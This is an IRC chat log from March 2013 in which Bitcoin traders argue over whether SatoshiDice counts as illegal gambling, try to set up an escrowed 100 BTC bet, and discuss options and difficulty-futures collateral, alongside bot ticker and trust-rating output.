weapons are a game of chance right? Mar 24 23:06:24 cant you sell those? Mar 24 23:06:47 you arent playing a game of chance to obtain wow items with promised payout multiples Mar 24 23:06:57 wow is not gambling. Mar 24 23:07:02 sd is Mar 24 23:07:15 wow does share the % likelihood Mar 24 23:07:17 of drops Mar 24 23:07:23 same for diablo Mar 24 23:07:32 quit argueing ridiculous statements and read the laws. if sd dice was legal everyone would have ran "token" games in the US. Mar 24 23:07:45 you must be mistaking me for a mirror Mar 24 23:07:52 long before BTC Mar 24 23:07:59 evenso...there is no precedent for an offshore company doing business in another currency to be under the jurisdiction of an american justice system unless they hold and or convert from USD Mar 24 23:08:45 i bet there are tons of foreign digital currencies US cant touch Mar 24 23:09:16 just internal schemes in games, or company promotions Mar 24 23:09:47 anywho i cant believe the conv is still going Mar 24 23:09:50 i have shit to do Mar 24 23:09:54 gl guys Mar 24 23:09:55 i know...so bored Mar 24 23:10:10 notice how he no longer brings up bitinstant/sdice conspiracy Mar 24 23:13:23 pay money to play a game of chance and if you win you get money back; that happens in blizzard games Mar 24 23:13:34 yeah Mar 24 23:13:46 i can't keep talking about this anymore Mar 24 23:13:51 same thing over and over Mar 24 23:14:02 ;;bc,stats Mar 24 23:14:05 Current Blocks: 227872 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1951 blocks | Next Difficulty In About: 1 week, 2 days, 10 hours, 12 minutes, and 10 seconds | Next Difficulty Estimate: 7901792.01955 | Estimated Percent Change: 18.01071 Mar 24 23:14:15 pay (what the us consideres) non-money to play a game of chance and get non-money back, it's illegal? Mar 24 23:14:16 i'm very interested in what is going to happen with the credit markets in bitcoins economy Mar 24 23:15:17 [BTCTC] [PAJKA.BOND] 1 @ 0.07 BTC [-] Mar 24 23:15:18 [BTCTC] [COGNITIVE] 1 @ 0.15 BTC [+] Mar 24 23:16:39 ;;ticker Mar 24 23:16:39 BTCUSD ticker | Best bid: 71.21001, Best ask: 71.30000, Bid-ask spread: 0.08999, Last trade: 71.21001, 24 hour volume: 42847.49345213, 24 hour low: 62.25139, 24 hour high: 72.49999, 24 hour vwap: 67.90892 Mar 24 23:19:45 ya know, i don't think tiberiusiv is a troll. troll keep going when trolled, don't they? Mar 24 23:21:45 yeah Mar 24 23:21:52 but seriously, did i miss something or did they basically say that SD was illegal because it's online gambling, and it's online gambling b/c it's online gambling Mar 24 23:21:53 He doesn't appear as a troll... Mar 24 23:21:55 ? Mar 24 23:23:30 why are you still repeating yourself smickles? the covnersation is over Mar 24 23:23:48 whose trolling who Mar 24 23:24:25 tiberiusiv: just because you don't want to participate anymore, doesn't mean the conversation is over Mar 24 23:24:49 so dont talk about me thanks. Mar 24 23:24:59 you must be new to the internet Mar 24 23:28:27 wager me 100 BTC that sdice gets in trouble in under 24months Mar 24 23:28:29 i don't mean to be rude, but i can talk about you and the ideas you presented Mar 24 23:28:30 i wasn't at the keyboard the whole time, so i might have missed tiberiusiv's reasoning as to why SD is gambling or gambling in the order that it needs to be regulated Mar 24 23:28:30 i want to know that Mar 24 23:28:30 100 btc is a significant portion of my btc, what are the terms? Mar 24 23:28:31 sdice and pals get into trouble Mar 24 23:28:31 and would you accept nanotube as escrow? Mar 24 23:28:31 with US authorities Mar 24 23:28:31 no im not going to give some stranger 100btc for 2 years to hold Mar 24 23:28:32 "get into trouble with US authorities" is a bit too vague Mar 24 23:28:32 lol. Mar 24 23:28:32 who would you accept as an escrow? Mar 24 23:28:32 tiberiusiv: they could get into trouble for pot or somehting Mar 24 23:28:32 your statement was vague Mar 24 23:28:33 my statement is not vague, they get in trouble for what they are doing Mar 24 23:28:37 not for pot Mar 24 23:28:39 for gambling Mar 24 23:28:54 not for running a gambling operation? Mar 24 23:29:14 for anything that revolves around gambling Mar 24 23:29:16 how ofter do you do this sort of thing? you seem new Mar 24 23:29:25 For running SD would be a clearer and simpler way to put it... Mar 24 23:29:26 the illiegality of it Mar 24 23:29:34 yes Mar 24 23:29:42 ok, who would you accept as an escrow? Mar 24 23:29:47 100btc bet and no im not sending my coins to anyone for 2 years Mar 24 23:30:05 youll have to do it on word. Mar 24 23:30:08 are you kidding? why should i risk my coins on your word? Mar 24 23:30:14 tiberiusiv then get 100btc worth of sdice and short it Mar 24 23:30:16 you arent risking anything Mar 24 23:30:20 or the other way around Mar 24 23:30:29 there is always risk to things Mar 24 23:30:37 probabilities Mar 24 23:30:40 risk is you get 0. Mar 24 23:30:42 Why the f would you sequester coins for 2 years. Mar 24 23:30:45 you never risk loss Mar 24 23:30:50 you can make SO MUCH from those coins Mar 24 23:31:02 for example, you could have bought calls last night Mar 24 23:31:03 just make sure you have them when the time runs out Mar 24 23:31:06 like me :) Mar 24 23:31:27 I'm not doing this without an escrow because i don't trust you Mar 24 23:31:37 ;;gettrust tiberiusiv Mar 24 23:31:37 Trust relationship from user smickles to user tiberiusiv: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=smickles&dest=tiberiusiv Mar 24 23:31:40 i dont get it, trust me to do what? Mar 24 23:31:51 pay if you lose Mar 24 23:31:59 ye using my Options spreadsheet bugpowder? Mar 24 23:32:03 right so you lose 0. Mar 24 23:32:12 smickles your talking alot now Mar 24 23:32:15 Namworld: nope Mar 24 23:32:16 are you accepting the bet or not? Mar 24 23:32:22 I just use my own brain Mar 24 23:32:30 no because you won't accept any escrow in the world Mar 24 23:32:35 ok. Mar 24 23:32:38 But my spreadsheet gives so much info... Mar 24 23:32:43 Too much info Mar 24 23:32:53 I generally just buy around the strike Mar 24 23:32:57 err Mar 24 23:33:02 tiberiusiv: here's the thing: if you plan to walk away if you lose, then the expected value of the bet to smickles is -50btc. (because he pays if he loses, but gets nothing if he wins) Mar 24 23:33:17 that's the point of the escrow, to make sure that one party is not planning to default in case of loss. Mar 24 23:33:24 the chances of smickles not paying are higher then me Mar 24 23:33:24 nanotube: thank you for being more articulate than me Mar 24 23:33:25 buy strikes around the currnet vwap Mar 24 23:33:28 since 100btc is huge for him. Mar 24 23:33:32 tiberiusiv: i would escrow too Mar 24 23:34:06 nanotube is the most trusted escrow arounds. He runs OTC and has escrowed far larger sums. Mar 24 23:34:15 smickles: at any rate, 2 years is a long time... so even with escrow i'd probably not bet on this. :) Mar 24 23:34:19 yea im not giving someone 100btc for 2 years Mar 24 23:34:23 Usually people just let nanotube handle escrow for bets and such. Mar 24 23:34:39 he said no so the topic is closed Mar 24 23:34:40 smickles: make it 1btc. in 2 years 1btc will equal 100btc today :D Mar 24 23:34:57 Eh Mar 24 23:35:05 tiberiusiv: i just advised smickles not to take the risk. if you both decide you want to, then i'm not going to stand in your way ;) Mar 24 23:35:28 tiberiusiv: would you use an escrow for a different amount? Mar 24 23:35:47 smickles: how about all of your BTC? none escrow Mar 24 23:35:57 stupid bet Mar 24 23:36:13 stupid offer really Mar 24 23:36:30 you are not betting your bitcoins...you are betting your promise to pay bitcoins Mar 24 23:36:36 tiberiusiv: I'm not doing the bet w/o a both party escrow. Are you willing to do any amount with an escrow? Mar 24 23:36:43 which i would not estimate is worth nearly 100 btc Mar 24 23:37:00 my holdings are probably some of the hihgest in this chat. Mar 24 23:37:08 not questioning that Mar 24 23:37:36 smickles: no 2 years is too long to have in someone i dont know escrow Mar 24 23:37:38 no one in any financial market would make an anonymous non collateralized bet 2 years out on a nebulous outcome Mar 24 23:37:54 tiberiusiv: i never said it had to be someone you don't know Mar 24 23:37:55 you don't know nanotube? Mar 24 23:38:00 no Mar 24 23:38:10 the idea of an escrow is that we both trust the escrow Mar 24 23:38:26 my point is...promise to pay is not the same as coins in the bank...no one would say that it is Mar 24 23:38:29 well, if there are no mutually trusted third parties, i guess this is a non-starter. Mar 24 23:38:38 ;;getrating nanotube Mar 24 23:38:38 Currently authenticated from hostmask nanotube!~nanotube@unaffiliated/nanotube . User nanotube, rated since Mon Nov 8 10:14:09 2010. Cumulative rating 674, from 186 total ratings. Received ratings: 186 positive, 0 negative. Sent ratings: 177 positive, 7 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=nanotube Mar 24 23:38:56 lol, is that the highest rating in all of otc? Mar 24 23:38:57 ;;getrating tiberiusiv Mar 24 23:38:57 This user has not yet been rated. WARNING: Currently not authenticated. Mar 24 23:39:12 ;;getrating smickles Mar 24 23:39:12 Currently authenticated from hostmask smickles!~smickles@67.222.146.32 . User smickles, rated since Wed Jan 4 18:28:52 2012. Cumulative rating 90, from 51 total ratings. Received ratings: 50 positive, 1 negative. Sent ratings: 51 positive, 6 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=smickles Mar 24 23:39:21 mjr_: i don't think nano is the highest rated Mar 24 23:39:35 how do i get authenticated? Mar 24 23:39:38 usagi neg'ed you? Mar 24 23:39:51 nanotube: you buy/sell btc? Mar 24 23:39:51 Bugpowder: yeah, for saying he defaulted on that contract Mar 24 23:39:54 you'd need to get registered with gribble Mar 24 23:39:58 ;;guide Mar 24 23:39:58 Error: "guide" is not a valid command. Mar 24 23:40:00 then build up trust through transactions Mar 24 23:40:02 http://wiki.bitcoin-otc.com/wiki/OTC_Rating_System Mar 24 23:40:15 nanotube founded the otc market, right? Mar 24 23:40:26 its called the web of trust and its the closest thing to a credit rating system that exists Mar 24 23:40:57 the idea of web of trust systems is not unique to bitcoin, nor started by it Mar 24 23:41:38 anyway, without a more clear definition (stock trades below .00001 or something that is easily verifiable) it isn't a good bet Mar 24 23:41:49 since we are talking about risks in investing in S.DICE Mar 24 23:42:30 it'd be easier and smarter to do options on the stock expiring two years out Mar 24 23:42:58 mircea_popescu: you might be interested in the logs of here starting at 21:26 utc Mar 24 23:43:07 either tiberiusiv selling a call or smickles selling a put...or some more complex combination Mar 24 23:43:46 mircea would agree with everything i said about sdice Mar 24 23:45:02 DRINK! mircea would agree with everything i said about sdice Mar 24 23:45:26 What can I do to borrow some of that capital, smickles? Mar 24 23:45:51 Can I put some stock in escrow? Mar 24 23:47:49 maybe this is an area for bitbet to embrace, Mar 24 23:47:57 escrowing personal bets Mar 24 23:49:01 clever idea... let bitbet take not open to the public bets. Would require some coding tho Mar 24 23:49:21 but still have an option to leave them visible to public Mar 24 23:49:28 yknow, for drama Mar 24 23:50:03 http://bitbet.us/bet/138/satoshidice-will-be-taken-down-seized-by-the-us/ Mar 24 23:50:29 teh market says "No".. at least not till june Mar 24 23:51:08 31% are no bets Mar 24 23:51:12 err yes bets Mar 24 23:51:27 thats very shaky confidence especially for june Mar 24 23:52:17 http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ can be conveived as a proxy bet, too Mar 24 23:53:13 well bitbet would have to climb twenty fold Mar 24 23:53:46 but if s.dice gets really seized this year, it would happen Mar 24 23:54:22 35% chance of bbet Mar 24 23:54:31 thats still quite high Mar 24 23:55:08 seized? Mar 24 23:55:13 this looks like a good bank Mar 24 23:55:17 no surpassing sdice Mar 24 23:55:19 these bets are like spare change though Mar 24 23:55:29 true Mar 24 23:55:34 and it's normal on bitbet that if anything gets over 90%/10% there are "just in case" bets arriving that push the odds back to middle Mar 24 23:55:54 so it isn't necessarily "shaky" indication Mar 24 23:56:06 we have 2 venues that are pricing major uncertainty on sdice Mar 24 23:56:13 do they have to take the servers physically? Mar 24 23:56:20 major? Mar 24 23:56:36 30% yes bets in 90days? 30%+ dividend yield on the stock... Mar 24 23:56:56 again this is spare change Mar 24 23:57:17 its like polling Mar 24 23:57:20 useless in low qty Mar 24 23:57:30 yes i know bbet is illiquid, mpex is illquid and inefficient blah blah blah Mar 24 23:57:45 tiberiusiv put some serious money on that former bet, you will get the liquidity Mar 24 23:57:52 i guarantee you Mar 24 23:57:58 my time frame was 24months not 3 Mar 24 23:58:10 actually i'd love it if you put 100btc against sdice on that bet Mar 24 23:58:12 or 2 and 1 week lol Mar 24 23:58:16 well, then make new one Mar 24 23:58:18 you might spook idiots Mar 24 23:58:51 what % of sdice is held by management Mar 24 23:59:00 Jurov is a big meanie head Mar 24 23:59:00 not knowable Mar 24 23:59:12 lol ~87% Mar 24 23:59:25 or should we say privately held Mar 24 23:59:29 yeah Mar 24 23:59:31 only 13% is floating? Mar 24 23:59:32 as evoorhees is the only manager Mar 24 23:59:36 yep Mar 24 23:59:43 which is what smickles has been trying to tell you Mar 24 23:59:55 ;;ticker Mar 24 23:59:55 BTCUSD ticker | Best bid: 71.90000, Best ask: 72.00000, Bid-ask spread: 0.10000, Last trade: 71.90000, 24 hour volume: 40862.73469029, 24 hour low: 62.26100, 24 hour high: 72.49999, 24 hour vwap: 68.23128 Mar 25 00:00:00 going on about 13% of the company defining its true value Mar 25 00:00:02 is silly Mar 25 00:00:05 evoorhees indicated maybe 10-30% being held by other investors Mar 25 00:00:06 ;;bc,24hrprc Mar 25 00:00:07 Error: "bc,24hrprc" is not a valid command. Mar 25 00:00:17 think its at least 2 others Mar 25 00:00:22 3 total Mar 25 00:00:35 that make up 87% and he has said he doesn't have a majority i believe Mar 25 00:01:57 i personally am expecting some news from sdice at some point in the next few months...they have been quiet for quite a while Mar 25 00:02:04 diff is i expect some good news Mar 25 00:02:19 but that is pure speculation on my part Mar 25 00:03:09 Bugpowder: i should have been scooping up some calls during the lows Mar 25 00:03:46 Bugpowder: i typically do the same thing. at the money calls, hold till end of month...haven't had an option expire worthless yet Mar 25 00:04:08 and in fact made about 300% this month, though i exercised early at 71 Mar 25 00:04:17 [BTCTC] [BASIC-MINING] 1 @ 0.3311 BTC [-] Mar 25 00:04:39 https://bitcointalk.org/index.php?topic=157789.msg1669605#msg1669605 scam? Mar 25 00:05:19 blockchain selling coinbase Mar 25 00:05:28 from piuk? i think not Mar 25 00:06:11 i thought i had seen his name as trustworthy, but was unaware coinbase was for sale Mar 25 00:06:13 [BTCTC] [SYNERGY] 6 @ 0.0099 = 0.0594 BTC [+] Mar 25 00:06:26 coinbase? Mar 25 00:06:32 the company out of san fran? Mar 25 00:06:41 they had 600k seed round Mar 25 00:06:49 didn't think it was from blockchain Mar 25 00:06:50 is that one of the sites everyone hates now? Mar 25 00:06:57 well... Mar 25 00:07:03 they obviously can't keep up with the demand Mar 25 00:07:10 so there is bound to be friction Mar 25 00:07:19 both coinbase and coinlab are reviled Mar 25 00:07:32 don't leave gox out Mar 25 00:07:36 though people still use them Mar 25 00:07:41 not voting with their feet yet Mar 25 00:07:58 it's tough to be in a queue to buy bitcoins and see the amount of bitcoins you can buy halved Mar 25 00:08:15 amazing that anyone manages to get coins with how much the companies have fucked up in managing expectations Mar 25 00:08:22 yep i'll say Mar 25 00:08:25 piuk wouldn't be selling unless there were more problems than queuing Mar 25 00:08:30 so these june diff futures Mar 25 00:09:11 ooh Mar 25 00:09:15 this is a real pe deal Mar 25 00:09:49 anyone get details at all? Mar 25 00:09:52 mjr_ were you around when i explained yest? Mar 25 00:09:58 rough pricing? denomination of payment? Mar 25 00:10:29 well...he is selling equity in a us company Mar 25 00:10:42 the shares you get will be denominated in dollars Mar 25 00:11:09 jurov: i had not seen, explained what? Mar 25 00:11:19 the problem with idiffs Mar 25 00:11:23 on mpex Mar 25 00:11:33 that they would need to triple the difficulty for me to break even? Mar 25 00:11:39 buying at that ask at least Mar 25 00:12:17 not that. that they can combust spontaneously befre difficulty even gets to 25 million Mar 25 00:12:28 hows that? Mar 25 00:12:53 collateral is 2.9 of something. or 2.9*2.9 of december something Mar 25 00:13:07 no one is sure what the something is Mar 25 00:13:19 the difficulty at that point i thought Mar 25 00:13:38 its a function of the difficulty as of the last futures contract known Mar 25 00:13:43 well, do the maffs yourself then Mar 25 00:14:46 ;;calc 4.8*2.9 Mar 25 00:14:57 13.92 Mar 25 00:15:14 for example for idiff created when diff was 4.8m Mar 25 00:15:23 no doesn't work like that Mar 25 00:15:38 another matonis forbes piece out: http://www.forbes.com/sites/jonmatonis/2013/03/24/cyprus-goes-cashless-the-hard-way/ Mar 25 00:15:39 no your right Mar 25 00:15:41 sorry Mar 25 00:15:45 going off of march Mar 25 00:15:49 not off of january Mar 25 00:16:17 yeah so 13.92 * 2.9 Mar 25 00:16:30 ;;calc 13.92 * 2.9 Mar 25 00:16:30 40.368 Mar 25 00:16:55 so you need to have up 40 million satoshi or 4 btc i think for each contract Mar 25 00:17:09 for sept Mar 25 00:17:40 for june only 1.4 btc Mar 25 00:17:59 eee 40m is 0.4 Mar 25 00:18:05 but you'll be autoliquidated in case of collateral being exceeded Mar 25 00:18:12 oops, moved the decimal Mar 25 00:18:34 so i don't see the problem Mar 25 00:18:39 you could be forcibly liquidated Mar 25 00:18:49 but at a profit to you of 2.9x i think Mar 25 00:19:05 for the person forcibly liquidated at least Mar 25 00:19:15 with the seller losing his collateral Mar 25 00:19:30 let's start from the begin. you buy idiff.jun at 0.2499 Mar 25 00:19:36 ok Mar 25 00:19:51 and get autoliquidated at 15million = you get 0.15 Mar 25 00:20:01 do both sides Mar 25 00:20:06 that's quite a pe , lol Mar 25 00:20:17 ah ok...hold on Mar 25 00:20:38 collateral is....013? Mar 25 00:21:03 maybe 0.13 or maybe more, depending on when the idiffs were created. Mar 25 00:21:15 0.13 is worst case Mar 25 00:21:15 thought it went off the last close Mar 25 00:21:22 quarterly Mar 25 00:21:39 did not know it changed intraquarter Mar 25 00:21:45 ah ok i see Mar 25 00:21:58 so you are saying that the current ask is ridiculous...no one should buy it Mar 25 00:22:00 yes i think it comes form last close, i would be thankful if you enumerated all the options Mar 25 00:22:00 fair enough Mar 25 00:22:16 but i think it won't be worth it in any case Mar 25 00:22:21 yes true Mar 25 00:22:28 but then again no one is forcing you to buy at that price Mar 25 00:22:36 last sale was .08 Mar 25 00:22:42 well within a profitable range Mar 25 00:22:50 roughly double in fact Mar 25 00:22:52 yawn Mar 25 00:22:55 ;;ticker Mar 25 00:22:56 BTCUSD ticker | Best bid: 71.90999, Best ask: 71.91965, Bid-ask spread: 0.00966, Last trade: 71.91000, 24 hour volume: 40908.12335116, 24 hour low: 62.70000, 24 hour high: 72.49999, 24 hour vwap: 68.36786 Mar 25 00:23:01 Mhm Mar 25 00:23:26 ofc, nobody forces me since i made my own: https://bitfunder.com/asset/CoinBr.iDiff-E Mar 25 00:23:39 hate to do commercial plugs but Mar 25 00:23:44 lol :) Mar 25 00:23:47 i think its great Mar 25 00:24:10 that one has known collateral and shorter maturity Mar 25 00:24:13 so caveat emptor market orders may not even have chance at profit Mar 25 00:25:18 yes Mar 25 00:25:49 so at .08 they look like a bargain for june Mar 25 00:26:20 lol i bought some at 0.035 back in january... someone made an erroneous order Mar 25 00:26:31 but was too ashamed to admit since Mar 25 00:26:32 fat finger lol Mar 25 00:26:47 nice trade :) Mar 25 00:26:51 when they do autocombust, i'll report Mar 25 00:27:11 well, luckily their possible losses are known Mar 25 00:27:45 looking forward to april options Mar 25 00:27:48 and june Mar 25 00:28:01 going to try and sell some puts to buy calls Mar 25 00:32:33 dude, watching barings go under is kinda excruciating but this movie is great Mar 25 00:33:35 like they were epic...british bank selling louisiana to the US for France WHILE france and britain were at war Mar 25 00:33:45 largest land deal in history up to that point Mar 25 00:34:32 mjr_: The depost on the puts is large Mar 25 00:34:51 also, nobody is selling for .08, just buying. Mar 25 00:34:59 Bugpowder: how is that possible Mar 25 00:35:02 if you want some at .249 I'm selling Mar 25 00:35:04 who do they buy from? Mar 25 00:35:14 someone sold to their bid Mar 25 00:35:20 Bugpowder, what does your IMMCover say? Mar 25 00:35:22 ok...so someone sold around .08 Mar 25 00:35:34 jurov, where is that? Mar 25 00:35:42 in statjson output Mar 25 00:35:47 mine were created a long time ago Mar 25 00:35:55 So much more than 2.9x current diff Mar 25 00:35:58 i was saying that i would simply place limit orders at the price i wanted and get filled or no Mar 25 00:36:48 wish i could calc how many puts per btc right now Mar 25 00:37:03 bugpowder i think the only way you can sell the idiffs is to show proof they are well covered :) Mar 25 00:37:28 yah, it sucks Mar 25 00:38:12 ;;calc 19.84/70 Mar 25 00:38:12 0.283428571429 Mar 25 00:38:24 thats the deposit per contract Mar 25 00:38:31 ok, I will lower my price a bit :) Mar 25 00:40:50 [BTCTC] [ASICMINER-PT] 5 @ 0.83799 = 4.19 BTC [-] Mar 25 00:40:58 i suppose i just confirmed that Jurov is a big meanie head Mar 25 00:41:22 is this at 70 strike? Mar 25 00:41:45 what? Mar 25 00:43:44 Bugpowder: that is the deposit on a 70 btc put? Mar 25 00:43:57 ;;calc 19.84/70 Mar 25 00:43:57 <@gribble> 0.283428571429 Mar 25 00:44:02 no, it's on idiff.jun Mar 25 00:44:13 bugpowder is selling Mar 25 00:44:39 oh ok Mar 25 00:45:14 what is the collateral requirement for a 70 put Mar 25 00:46:00 ;;bc,24hprc Mar 25 00:46:01 68.26 Mar 25 00:46:26 ;;calc 70/68 Mar 25 00:46:26 1.02941176471 Mar 25 00:46:34 something more than that Mar 25 00:46:35 its more than that Mar 25 00:46:37 yeha Mar 25 00:46:45 probably around 90 Mar 25 00:47:02 if you want calls, buy calls Mar 25 00:47:07 [MPEX] [S.DICE] 2000 @ 0.004004 = 8.008 BTC [-] Mar 25 00:47:22 90? Mar 25 00:47:27 around there Mar 25 00:47:35 The formula is not known Mar 25 00:47:36 90 btc per put? Mar 25 00:47:45 no about 1.2 per put Mar 25 00:47:59 [MPEX] [S.DICE] 352 @ 0.004 = 1.408 BTC [-] Mar 25 00:48:00 create a single put and find out. Mar 25 00:48:05 report back Mar 25 00:48:13 calls are always 1BTC Mar 25 00:48:18 Puts are always more Mar 25 00:48:22 than 1 BTC Mar 25 00:48:56 thats not ture Mar 25 00:48:57 true Mar 25 00:49:10 it is possible to create multiple puts for 1 btc Mar 25 00:49:13 it depends on strike Mar 25 00:49:58 the only thing we know is that puts are a function of strike so you could get multiple puts per btc or fewer than 1 puts per btc Mar 25 00:50:54 at least that is how it was explained to me...i mean who needs more than a 1 btc for a put struck at $1? Mar 25 00:50:56 my calculation was as per the faq, but there's some padding. Mar 25 00:51:14 now that put would be more than likely worthless to everyone Mar 25 00:51:21 but if you figure that's one end of the spectrum Mar 25 00:51:38 a put at $120 or so would be the other side (not sure max strike atm) Mar 25 00:54:12 max strike is 75 atm, planned to be 200 Mar 25 00:54:20 ah cool Mar 25 00:57:25 puts are tough Mar 25 00:59:09 mjr_: The minimum is 1 BTC. Any strike will go to infinite BTC value if BTC falls to $0. Mar 25 00:59:56 the 2% creation fee pays for 'insurance' on that possibility Mar 25 01:00:17 obviously if BTC goes to zero, you could just buy infinte BTC to pay the debt. Mar 25 01:03:36 that's quite a philosophical exercise, since there will be only 21M BTC ever. Mar 25 01:04:24 such debt would prolly be better repaid with pizza Mar 25 01:04:32 :) Mar 25 01:04:41 lol Mar 25 01:06:21 [BTCTC] [ASICMINER-PT] 6 @ 0.81 = 4.86 BTC [-] Mar 25 01:07:06 If Bitcoin was to permanently become worthless, I'd gladly accept a pizza instead =/ Mar 25 01:08:01 Each PUT requires an amount of collateral equal to strike / spot BTC . Mar 25 01:08:11 using MKOPT Mar 25 01:08:20 yes, but there's some additional secret sauce Mar 25 01:08:31 is that not for split? Mar 25 01:09:01 split doesn't tell you what margin requirements are exactly Mar 25 01:09:23 according to my understanding, split jusr divides provided amount into half Mar 25 01:09:33 only that you will get a certain number of puts based on the strike/current Mar 25 01:09:35 and for puts it uses same formula as mkopt Mar 25 01:09:37 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Mar 25 01:09:38 [BTCTC] [ASICMINER-PT] 3 @ 0.8 = 2.4 BTC [-] Mar 25 01:09:40 but the MKOPT seemed straightforward Mar 25 01:09:50 ah ok Mar 25 01:10:53 ;;rate [ident Namworld] 1 Mar 25 01:10:54 gribble? Mar 25 01:10:54 ;;rate Namworld 1 Mar 25 01:10:54 D: Mar 25 01:10:55 Rating entry successful. Your rating of 1 for user Namworld has been recorded. Mar 25 01:10:56 Rating entry successful. Your rating for user Namworld has changed from 1 to 1. Mar 25 01:11:02 oh, lag Mar 25 01:11:11 ;;gribblelag Mar 25 01:11:11 Error: "gribblelag" is not a valid command. Mar 25 01:11:22 ;;latency Mar 25 01:11:23 0.10 seconds. Mar 25 01:11:31 ;) Mar 25 01:11:33 ah so :) Mar 25 01:11:40 ;;goxlag Mar 25 01:11:41 0 seconds Mar 25 01:11:50 urmom Mar 25 01:12:11 ;;ticker Mar 25 01:12:11 BTCUSD ticker | Best bid: 71.20001, Best ask: 71.85100, Bid-ask spread: 0.65099, Last trade: 71.20001, 24 hour volume: 40755.29045224, 24 hour low: 62.70000, 24 hour high: 72.49999, 24 hour vwap: 68.61685 Mar 25 01:12:19 is the api back up? or nanotube updated? Mar 25 01:13:45 https://data.mtgox.com/api/2/BTCUSD/money/ticker is working Mar 25 01:14:59 and it's at 72.4999, everyone fasten the seat belt Mar 25 01:15:17 urgh, lost connection Mar 25 01:23:04 can someone explain the wall theory nonsense to me? Mar 25 01:23:12 so many stupid conspiracy theories on the forum Mar 25 01:23:24 WALLMAKERS Mar 25 01:24:25 lol Mar 25 01:24:25 who would report gribble lag? Mar 25 01:24:26 that was such a sad movie Mar 25 01:24:26 the jacket he wore sold for 21,000X what barings was sold to ING for Mar 25 01:24:26 if that isn't fucked up, i don't know what is Mar 25 01:24:34 taub: my understanding is that the wall is a large amount of sell orders that were put on the upper margin by bears. Mar 25 01:24:40 taub not much to explain Mar 25 01:24:50 forum consists of posts. posts have to be made. Mar 25 01:24:54 so they'll be made. Mar 25 01:25:04 woah, netsplit Mar 25 01:25:27 taub: link me? Mar 25 01:25:53 https://bitcointalk.org/index.php?topic=85687.msg1668250#msg1668250 posts like these Mar 25 01:26:46 yea cadsII, but people think because bitcoin has great longterm potential that there wont be any dips or something heh Mar 25 01:27:26 eh stupid people will be stupid Mar 25 01:27:45 yep just a bunch of resting orders on a book at a certain price Mar 25 01:27:59 seems like people forget about the old cancel button far too often Mar 25 01:28:16 https://bitcointalk.org/index.php?topic=85687.msg1668521#msg1668521 Mar 25 01:28:20 lmao that guy is funnaty Mar 25 01:28:41 the forum. it delivers. Mar 25 01:29:00 783 pages ?! Mar 25 01:30:22 ;;get info tradefortress Mar 25 01:30:23 Error: The command "get" is available in the Dunno, Herald, and Topic plugins. Please specify the plugin whose command you wish to call by using its name as a command before "get". Mar 25 01:30:27 ;;getinfo tradefortress Mar 25 01:30:28 Error: "getinfo" is not a valid command. Mar 25 01:30:36 sigh Mar 25 01:31:30 i wonder how many short positions there really are Mar 25 01:31:30 i know of one place where you can short Mar 25 01:31:30 and i don't think their volume is a huge percentage Mar 25 01:31:57 ;;gpg info tradefortress Mar 25 01:31:57 User 'TradeFortress', with keyid None, fingerprint None, and bitcoin address 1xw6QFuj3jvQ1spfT9H5kqitaByeJjSRB, registered on Sun Sep 23 04:48:53 2012. http://bitcoin-otc.com/viewgpg.php?nick=TradeFortress . Currently not authenticated. Mar 25 01:32:33 ty! Mar 25 01:33:01 mjr_ you mean on bitcoin ? Mar 25 01:33:04 en pee Mar 25 01:33:31 its funny though Mar 25 01:33:31 because all those people who think that walls are conspiracies Mar 25 01:33:31 don't realize that the wallmakers have all the risk Mar 25 01:33:31 or should i say most Mar 25 01:33:31 price manipulators are usually fighting the market Mar 25 01:33:31 trying to maintain prices buy support buying or what have you Mar 25 01:33:31 or on the flip side trying to keep price low while waiting for funds to clear (stupidest theory) Mar 25 01:33:40 the bigger the market the harder to control Mar 25 01:33:52 the entire manipulation thing is kind of nonsense. Mar 25 01:34:01 but since peiople's education consists mostly of films and novels Mar 25 01:34:09 and conspiracy is the cheapest plot device Mar 25 01:34:18 people's education consists mostly of conspiracy Mar 25 01:34:28 hah :D Mar 25 01:34:30 still, i wouldn't rule out somethink like goxapi backdoor Mar 25 01:34:48 jurov sure. Mar 25 01:34:59 https://bitcointalk.org/index.php?topic=157519.0 << check this one out. the 0.015 btc scammor. Mar 25 01:35:21 0.015 :/ Mar 25 01:35:51 lol Mar 25 01:35:54 and with the dearth of margin (5 x 1 is good in btc trading...300 x 1 is easy in forex) you can't put up the imposing walls that make people sit back Mar 25 01:36:17 where can you trade btc on a margin? Mar 25 01:36:27 on mpex lol. Mar 25 01:36:28 theres this one site but it has high fees Mar 25 01:36:30 0.015 affords you a palace in shantytown Mar 25 01:36:33 mpex? Mar 25 01:36:33 Hey arij Mar 25 01:36:37 except those don't get mixed into the main market info by design Mar 25 01:36:37 hey nam Mar 25 01:37:12 oh that:) Mar 25 01:39:12 but anyway, re shorts : there were at least 20k btc total in short positions at a few points this month Mar 25 01:39:27 and last month prolly more Mar 25 01:41:23 USD Current rate (APY): 328.63% Mar 25 01:41:44 bitfinex ? Mar 25 01:41:45 7 510.0% 1486.84 2 Mar 25 01:41:49 yes Mar 25 01:41:52 heh. Mar 25 01:42:11 the second one is a 7 day loan at 510% Mar 25 01:42:16 that is a standing offer Mar 25 01:42:34 ~1500 USD requested at that rate Mar 25 01:42:36 hahaah get a load of this : Mar 25 01:42:57 ;;gpg info MagicalTux Mar 25 01:42:58 User 'MagicalTux', with keyid 1C797C313C89C25F, fingerprint 6EF3EC1D36EE80D651E8A7991C797C313C89C25F, and bitcoin address None, registered on Sun Mar 6 22:43:15 2011. http://bitcoin-otc.com/viewgpg.php?nick=MagicalTux . Currently not authenticated. Mar 25 01:43:15 ;;getrating MagicalTux Mar 25 01:43:16 WARNING: Currently not authenticated. User MagicalTux, rated since Mon Dec 20 10:21:21 2010. Cumulative rating 116, from 37 total ratings. Received ratings: 37 positive, 0 negative. Sent ratings: 14 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=MagicalTux Mar 25 01:43:19 ;;getrating mircea_popescu Mar 25 01:43:20 WARNING: Currently not authenticated. User mircea_popescu, rated since Fri Jul 22 08:04:26 2011. Cumulative rating 116, from 60 total ratings. Received ratings: 55 positive, 5 